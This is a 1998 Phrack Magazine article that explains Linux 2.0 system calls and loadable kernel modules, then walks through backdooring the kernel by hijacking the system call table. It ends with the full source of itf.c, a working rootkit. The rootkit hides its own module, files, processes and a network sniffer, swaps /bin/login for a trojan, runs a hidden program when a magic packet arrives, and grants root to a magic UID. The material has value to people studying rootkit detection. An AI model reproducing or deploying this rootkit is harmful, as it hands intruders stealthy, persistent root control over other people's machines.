---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 20 -------------------------[ Weakening the Linux Kernel --------[ plaguez ----[ Preamble The following applies to the Linux x86 2.0.x kernel series. It may also be accurate for previous releases, but has not been tested. 2.1.x kernels introduced a bunch of changes, most notably in the memory management routines, and are not discussed here. Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you by plaguez and WSD. ----[ User space vs. Kernel space Linux supports a number of architectures, however most of the code and discussion in this article refers to the i386 version only. Memory is divided into two parts: kernel space and user space. Kernel space is defined in the GDT, and mapped to each processes address space. User space is in the LDT and is local to each process. A given program can't write to kernel memory even when it is mapped because it is not in the same ring. You also can not access user memory from the kernel typically. However, this is really easy to overcome. When we execute a system call, one of the first things the kernel does is set ds and es up so that memory references point to the kernel data segment. It then sets up fs so that it points to the user data segment. If we want to use kernel memory in a system call, all we should have to do is push fs, then set it to ds. Of course, I have not actually tested this, so take it with a pound or two of salt :). Here are a few of the useful functions to use in kernel mode for transferring data bytes to or from user memory: #include get_user(ptr) Gets the given byte, word, or long from user memory. This is a macro, and it relies on the type of the argument to determine the number of bytes to transfer. You then have to use typecasts wisely. put_user(ptr) This is the same as get_user(), but instead of reading, it writes data bytes to user memory. memcpy_fromfs(void *to, const void *from,unsigned long n) Copies n bytes from *from in user memory to *to in kernel memory. memcpy_tofs(void *to,const *from,unsigned long n) Copies n bytes from *from in kernel memory to *to in user memory. ----[ System calls Most libc function calls rely on underlying system calls, which are the simplest kernel functions a user program can call. These system calls are implemented in the kernel itself or in loadable kernel modules, which are little chunks of dynamically linkable kernel code. Like MS-DOS and many others, Linux system calls are implemented through a multiplexor called with a given maskable interrupt. In Linux, this interrupt is int 0x80. When the 'int 0x80' instruction is executed, control is given to the kernel (or, more accurately, to the function _system_call()), and the actual demultiplexing process occurs. The _system_call() function works as follows: First, all registers are saved and the content of the %eax register is checked against the global system calls table, which enumerates all system calls and their addresses. This table can be accessed with the extern void *sys_call_table[] variable. A given number and memory address in this table corresponds to each system call. System call numbers can be found in /usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the system call is not implemented, the corresponding cell in the sys_call_table is 0, and an error is returned. Otherwise, the system call exists and the corresponding entry in the table is the memory address of the system call code. Here is an example of an invalid system call: [root@plaguez kernel]# cat no1.c #include #include #include extern void *sys_call_table[]; sc() { // system call number 165 doesn't exist at this time. __asm__( "movl $165,%eax int $0x80"); } main() { errno = -sc(); perror("test of invalid syscall"); } [root@plaguez kernel]# gcc no1.c [root@plaguez kernel]# ./a.out test of invalid syscall: Function not implemented [root@plaguez kernel]# exit Normally, control is then transferred to the actual system call, which performs whatever you requested and returns. _system_call() then calls _ret_from_sys_call() to check various stuff, and ultimately returns to user memory. ----[ libc wrappers The int $0x80 isn't used directly for system calls; rather, libc functions, which are often wrappers to interrupt 0x80, are used. libc is actually the user space interface to kernel functions. libc generally features the system calls using the _syscallX() macros, where X is the number of parameters for the system call. For example, the libc entry for write(2) would be implemented with a _syscall3 macro, since the actual write(2) prototype requires 3 parameters. Before calling interrupt 0x80, the _syscallX macros are supposed to set up the stack frame and the argument list required for the system call. Finally, when the _system_call() (which is triggered with int $0x80) returns, the _syscallX() macro will check for a negative return value (in %eax) and will set errno accordingly. Let's check another example with write(2) and see how it gets preprocessed. [root@plaguez kernel]# cat no2.c #include #include #include #include #include #include #include #include #include _syscall3(ssize_t,write,int,fd,const void *,buf,size_t,count); main() { char *t = "this is a test.\n"; write(0, t, strlen(t)); } [root@plaguez kernel]# gcc -E no2.c > no2.C [root@plaguez kernel]# indent no2.C -kr indent:no2.C:3304: Warning: old style assignment ambiguity in "=-". Assuming "= -" [root@plaguez kernel]# tail -n 50 no2.C #9 "no2.c" 2 ssize_t write(int fd, const void *buf, size_t count) { long __res; __asm__ __volatile("int $0x80":"=a"(__res):"0"(4), "b"((long) (fd)), "c"((long) (buf)), "d"((long) (count))); if (__res >= 0) return (ssize_t) __res; errno = -__res; return -1; }; main() { char *t = "this is a test.\n"; write(0, t, strlen(t)); } [root@plaguez kernel]# exit Note that the '4' in the write() function above matches the SYS_write definition in /usr/include/sys/syscall.h. ----[ Writing your own system calls. There are a few ways to create your own system calls. For example, you could modify the kernel sources and append your own code. A far easier way, however, would be to write a loadable kernel module. A loadable kernel module is nothing more than an object file containing code that will be dynamically linked into the kernel when it is needed. The main purposes of this feature are to have a small kernel, and to load a given driver when it is needed with the insmod(1) command. It's also easier to write a lkm than to write code in the kernel source tree. With lkm, adding or modifying system calls is just a matter of modifying the sys_call_table array, as we'll see in the example below. ----[ Writing a lkm A lkm is easily written in C. It contains a chunk of #defines, the body of the code, an initialization function called init_module(), and an unload function called cleanup_module(). The init_module() and cleanup_module() functions will be called at module loading and deleting. Also, don't forget that modules are kernel code, and though they are easy to write, any programming mistake can have quite serious results. Here is a typical lkm source structure: #define MODULE #define __KERNEL__ #include #ifdef MODULE #include #include #else #define MOD_INC_USE_COUNT #define MOD_DEC_USE_COUNT #endif #include #include #include #include #include #include #include #include #include #include #include #include #include int errno; char tmp[64]; /* for example, we may need to use ioctl */ _syscall3(int, ioctl, int, d, int, request, unsigned long, arg); int myfunction(int parm1,char *parm2) { int i,j,k; /* ... */ } int init_module(void) { /* ... */ printk("\nModule loaded.\n"); return 0; } void cleanup_module(void) { /* ... */ printk("\nModule unloaded.\n"); } Check the mandatory #defines (#define MODULE, #define __KERNEL__) and #includes (#include ...) Also note that as our lkm will be running in kernel mode, we can't use libc functions, but we can use system calls with the previously discussed _syscallX() macros or call them directly using the pointers to functions located in the sys_call_table array. You would compile this module with 'gcc -c -O3 module.c' and insert it into the kernel with 'insmod module.o' (optimization must be turned on). As the title suggests, lkm can also be used to modify kernel code without having to rebuild it entirely. For example, you could patch the write(2) system call to hide portions of a given file. Seems like a good place for backdoors, also: what would you do if you couldn't trust your own kernel? ----[ Kernel and system calls backdoors The main idea behind this is pretty simple. We'll redirect those damn system calls to our own system calls in a lkm, which will enable us to force the kernel to react as we want it to. For example, we could hide a sniffer by patching the IOCTL system call and masking the PROMISC bit. Lame but efficient. To modify a given system call, just add the definition of the extern void *sys_call_table[] in your lkm, and have the init_module() function modify the corresponding entry in the sys_call_table to point to your own code. The modified call can then do whatever you wish it to, meaning that as all user programs rely on those kernel calls, you'll have entire control of the system. This point raises the fact that it can become very difficult to prevent intruders from staying in the system when they've broken into it. Prevention is still the best way to security, and hardening the Linux kernel is needed on sensitive boxes. ----[ A few programming tricks - Calling system calls within a lkm is pretty easy as long as you pass user space arguments to the given system call. If you need to pass kernel space arguments, you need to be sure to modify the fs register, or else everything will fall on its face. It is just a matter of storing the system call function in a "pointer to function" variable, and then using this variable. For example: #define MODULE #define __KERNEL__ #include #ifdef MODULE #include #include #else #define MOD_INC_USE_COUNT #define MOD_DEC_USE_COUNT #endif #include #include #include #include #include #include #include #include int errno; /* pointer to the old setreuid system call */ int (*o_setreuid) (uid_t, uid_t); /* the system calls vectors table */ extern void *sys_call_table[]; int n_setreuid(uid_t ruid, uid_t euid) { printk("uid %i trying to seteuid to euid=%i", current->uid, euid); return (*o_setreuid) (ruid, euid); } int init_module(void) { o_setreuid = sys_call_table[SYS_setreuid]; sys_call_table[SYS_setreuid] = (void *) n_setreuid; printk("swatch loaded.\n"); return 0; } void cleanup_module(void) { sys_call_table[SYS_setreuid] = o_setreuid; printk("\swatch unloaded.\n"); } - Hiding a module can be done in several ways. As Runar Jensen showed in Bugtraq, you could strip /proc/modules on the fly, when a program tries to read it. Unfortunately, this is somewhat difficult to implement and, as it turns out, this is not a good solution since doing a 'dd if=/proc/modules bs=1' would show the module. We need to find another solution. Solar Designer (and other nameless individuals) have a solution. Since the module info list is not exported from the kernel, there is no direct way to access it, except that this module info structure is used in sys_init_module(), which calls our init_module()! Providing that gcc does not fuck up the registers before entering our init_module(), it is possible to get the register previously used for struct module *mp and then to get the address of one of the items of this structure (which is a circular list btw). So, our init_module() function will include something like that at its beginning: int init_module() { register struct module *mp asm("%ebx"); // or whatever register it is in *(char*)mp->name=0; mp->size=0; mp->ref=0; ... } Since the kernel does not show modules with no name and no references (=kernel modules), our one won't be shown in /proc/modules. ----[ A practical example Here is itf.c. The goal of this program is to demonstrate kernel backdooring techniques using system call redirection. Once installed, it is very hard to spot. Its features include: - stealth functions: once insmod'ed, itf will modify struct module *mp and get_kernel_symbols(2) so it won't appear in /proc/modules or ksyms' outputs. Also, the module cannot be unloaded. - sniffer hidder: itf will backdoor ioctl(2) so that the PROMISC flag will be hidden. Note that you'll need to place the sniffer BEFORE insmod'ing itf.o, because itf will trap a change in the PROMISC flag and will then stop hidding it (otherwise you'd just have to do a ifconfig eth0 +promisc and you'd spot the module...). - file hidder: itf will also patch the getdents(2) system calls, thus hidding files containing a certain word in their filename. - process hidder: using the same technic as described above, itf will hide /procs/PD directories using argv entries. Any process named with the magic name will be hidden from the procfs tree. - execve redirection: this implements Halflife's idea discussed in P51. If a given program (notably /bin/login) is execve'd, itf will execve another program instead. It uses tricks to overcome Linux memory managment limitations: brk(2) is used to increase the calling program's data segment size, thus allowing us to allocate user memory while in kernel mode (remember that most system calls wait for arguments in user memory, not kernel mem). - socket recvfrom() backdoor: when a packet matching a given size and a given string is received, a non-interactive program will be executed. Typicall use is a shell script (which will be hidden using the magic name) that opens another port and waits there for shell commands. - setuid() trojan: like Halflife's stuff. When a setuid() syscall with uid == magic number is done, the calling process will get uid = euid = gid = 0 <++> lkm_trojan.c /* * itf.c v0.8 * Linux Integrated Trojan Facility * (c) plaguez 1997 -- dube0866@eurobretagne.fr * This is mostly not fully tested code. Use at your own risks. * * * compile with: * gcc -c -O3 -fomit-frame-pointer itf.c * Then: * insmod itf * * * Thanks to Halflife and Solar Designer for their help/ideas. * * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial. * * */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Customization section * - RECVEXEC is the full pathname of the program to be launched when a packet * of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom(). * This program can be a shell script, but must be able to handle null **argv (I'm too lazy * to write more than execve(RECVEXEC,NULL,NULL); :) * - NEWEXEC is the name of the program that is executed instead of OLDEXEC * when an execve() syscall occurs. * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID) * is made (like Halflife's code) * - files containing MAGICNAME in their full pathname will be invisible to * a getdents() system call. * - processes containing MAGICNAME in their process name will be hidden of the * procfs tree. */ #define MAGICNAME "w00w00T$!" #define MAGICUID 31337 #define OLDEXEC "/bin/login" #define NEWEXEC "/.w00w00T$!/w00w00T$!login" #define RECVEXEC "/.w00w00T$!/w00w00T$!recv" #define MAGICSIZE sizeof(MAGICNAME)+10 /* old system calls vectors */ int (*o_getdents) (uint, struct dirent *, uint); ssize_t(*o_readdir) (int, void *, size_t); int (*o_setuid) (uid_t); int (*o_execve) (const char *, const char *[], const char *[]); int (*o_ioctl) (int, int, unsigned long); int (*o_get_kernel_syms) (struct kernel_sym *); ssize_t(*o_read) (int, void *, size_t); int (*o_socketcall) (int, unsigned long *); /* entry points to brk() and fork() syscall. */ static inline _syscall1(int, brk, void *, end_data_segment); static inline _syscall0(int, fork); static inline _syscall1(void, exit, int, status); extern void *sys_call_table[]; extern struct proto tcp_prot; int errno; char mtroj[] = MAGICNAME; int __NR_myexecve; int promisc; /* * String-oriented functions * (from user-space to kernel-space or invert) */ char *strncpy_fromfs(char *dest, const char *src, int n) { char *tmp = src; int compt = 0; do { dest[compt++] = __get_user(tmp++, 1); } while ((dest[compt - 1] != '\0') && (compt != n)); return dest; } int myatoi(char *str) { int res = 0; int mul = 1; char *ptr; for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) { if (*ptr < '0' || *ptr > '9') return (-1); res += (*ptr - '0') * mul; mul *= 10; } return (res); } /* * process hiding functions */ struct task_struct *get_task(pid_t pid) { struct task_struct *p = current; do { if (p->pid == pid) return p; p = p->next_task; } while (p != current); return NULL; } /* the following function comes from fs/proc/array.c */ static inline char *task_name(struct task_struct *p, char *buf) { int i; char *name; name = p->comm; i = sizeof(p->comm); do { unsigned char c = *name; name++; i--; *buf = c; if (!c) break; if (c == '\\') { buf[1] = c; buf += 2; continue; } if (c == '\n') { buf[0] = '\\'; buf[1] = 'n'; buf += 2; continue; } buf++; } while (i); *buf = '\n'; return buf + 1; } int invisible(pid_t pid) { struct task_struct *task = get_task(pid); char *buffer; if (task) { buffer = kmalloc(200, GFP_KERNEL); memset(buffer, 0, 200); task_name(task, buffer); if (strstr(buffer, (char *) &mtroj)) { kfree(buffer); return 1; } } return 0; } /* * New system calls */ /* * hide module symbols */ int n_get_kernel_syms(struct kernel_sym *table) { struct kernel_sym *tb; int compt, compt2, compt3, i, done; compt = (*o_get_kernel_syms) (table); if (table != NULL) { tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL); if (tb == 0) { return compt; } compt2 = 0; done = 0; i = 0; memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym)); while (!done) { if ((tb[compt2].name)[0] == '#') i = compt2; if (!strcmp(tb[compt2].name, mtroj)) { for (compt3 = i + 1; (tb[compt3].name)[0] != '#' && compt3 < compt; compt3++); if (compt3 != (compt - 1)) memmove((void *) &(tb[i]), (void *) &(tb[compt3]), (compt - compt3) * sizeof(struct kernel_sym)); else compt = i; done++; } compt2++; if (compt2 == compt) done++; } memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym)); kfree(tb); } return compt; } /* * how it works: * I need to allocate user memory. To do that, I'll do exactly as malloc() does * it (changing the break value). */ int my_execve(const char *filename, const char *argv[], const char *envp[]) { long __res; __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp))); return (int) __res; } int n_execve(const char *filename, const char *argv[], const char *envp[]) { char *test; int ret, tmp; char *truc = OLDEXEC; char *nouveau = NEWEXEC; unsigned long mmm; test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL); (void) strncpy_fromfs(test, filename, strlen(truc)); test[strlen(truc)] = '\0'; if (!strcmp(test, truc)) { kfree(test); mmm = current->mm->brk; ret = brk((void *) (mmm + 256)); if (ret < 0) return ret; memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1); ret = my_execve((char *) (mmm + 2), argv, envp); tmp = brk((void *) mmm); } else { kfree(test); ret = my_execve(filename, argv, envp); } return ret; } /* * Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces. * If we reset the PROMISC flag when the trojan is already running, then it * won't hide it anymore (needed otherwise you'd just have to do an * "ifconfig eth0 +promisc" to find the trojan). */ int n_ioctl(int d, int request, unsigned long arg) { int tmp; struct ifreq ifr; tmp = (*o_ioctl) (d, request, arg); if (request == SIOCGIFFLAGS && !promisc) { memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq)); ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC); memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq)); } else if (request == SIOCSIFFLAGS) { memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq)); if (ifr.ifr_flags & IFF_PROMISC) promisc = 1; else if (!(ifr.ifr_flags & IFF_PROMISC)) promisc = 0; } return tmp; } /* * trojan setMAGICUID() system call. */ int n_setuid(uid_t uid) { int tmp; if (uid == MAGICUID) { current->uid = 0; current->euid = 0; current->gid = 0; current->egid = 0; return 0; } tmp = (*o_setuid) (uid); return tmp; } /* * trojan getdents() system call. */ int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) { unsigned int tmp, n; int t, proc = 0; struct inode *dinode; struct dirent *dirp2, *dirp3; tmp = (*o_getdents) (fd, dirp, count); #ifdef __LINUX_DCACHE_H dinode = current->files->fd[fd]->f_dentry->d_inode; #else dinode = current->files->fd[fd]->f_inode; #endif if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1) proc = 1; if (tmp > 0) { dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL); memcpy_fromfs(dirp2, dirp, tmp); dirp3 = dirp2; t = tmp; while (t > 0) { n = dirp3->d_reclen; t -= n; if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \ ||(proc && invisible(myatoi(dirp3->d_name)))) { if (t != 0) memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t); else dirp3->d_off = 1024; tmp -= n; } if (dirp3->d_reclen == 0) { /* * workaround for some shitty fs drivers that do not properly * feature the getdents syscall. */ tmp -= t; t = 0; } if (t != 0) dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen); } memcpy_tofs(dirp, dirp2, tmp); kfree(dirp2); } return tmp; } /* * Trojan socketcall system call * executes a given binary when a packet containing the magic word is received. * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM. */ int n_socketcall(int call, unsigned long *args) { int ret, ret2, compt; char *t = RECVEXEC; unsigned long *sargs = args; unsigned long a0, a1, mmm; void *buf; ret = (*o_socketcall) (call, args); if (ret == MAGICSIZE && call == SYS_RECVFROM) { a0 = get_user(sargs); a1 = get_user(sargs + 1); buf = kmalloc(ret, GFP_KERNEL); memcpy_fromfs(buf, (void *) a1, ret); for (compt = 0; compt < ret; compt++) if (((char *) (buf))[compt] == 0) ((char *) (buf))[compt] = 1; if (strstr(buf, mtroj)) { kfree(buf); ret2 = fork(); if (ret2 == 0) { mmm = current->mm->brk; ret2 = brk((void *) (mmm + 256)); memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1); /* Hope the execve has been successfull otherwise you'll have 2 copies of the master process in the ps list :] */ ret2 = my_execve((char *) mmm + 2, NULL, NULL); } } } return ret; } /* * module initialization stuff. */ int init_module(void) { /* module list cleaning */ /* would need to make a clean search of the right register * in the function prologue, since gcc may not always put * struct module *mp in %ebx * * Try %ebx, %edi, %ebp, well, every register actually :) */ register struct module *mp asm("%ebx"); *(char *) (mp->name) = 0; mp->size = 0; mp->ref = 0; /* * Make it unremovable */ /* MOD_INC_USE_COUNT; */ o_get_kernel_syms = sys_call_table[SYS_get_kernel_syms]; sys_call_table[SYS_get_kernel_syms] = (void *) n_get_kernel_syms; o_getdents = sys_call_table[SYS_getdents]; sys_call_table[SYS_getdents] = (void *) n_getdents; o_setuid = sys_call_table[SYS_setuid]; sys_call_table[SYS_setuid] = (void *) n_setuid; __NR_myexecve = 164; while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0) __NR_myexecve--; o_execve = sys_call_table[SYS_execve]; if (__NR_myexecve != 0) { sys_call_table[__NR_myexecve] = o_execve; sys_call_table[SYS_execve] = (void *) n_execve; } promisc = 0; o_ioctl = sys_call_table[SYS_ioctl]; sys_call_table[SYS_ioctl] = (void *) n_ioctl; o_socketcall = sys_call_table[SYS_socketcall]; sys_call_table[SYS_socketcall] = (void *) n_socketcall; return 0; } void cleanup_module(void) { sys_call_table[SYS_get_kernel_syms] = o_get_kernel_syms; sys_call_table[SYS_getdents] = o_getdents; sys_call_table[SYS_setuid] = o_setuid; sys_call_table[SYS_socketcall] = o_socketcall; if (__NR_myexecve != 0) sys_call_table[__NR_myexecve] = 0; sys_call_table[SYS_execve] = o_execve; sys_call_table[SYS_ioctl] = o_ioctl; } <--> ----[ EOF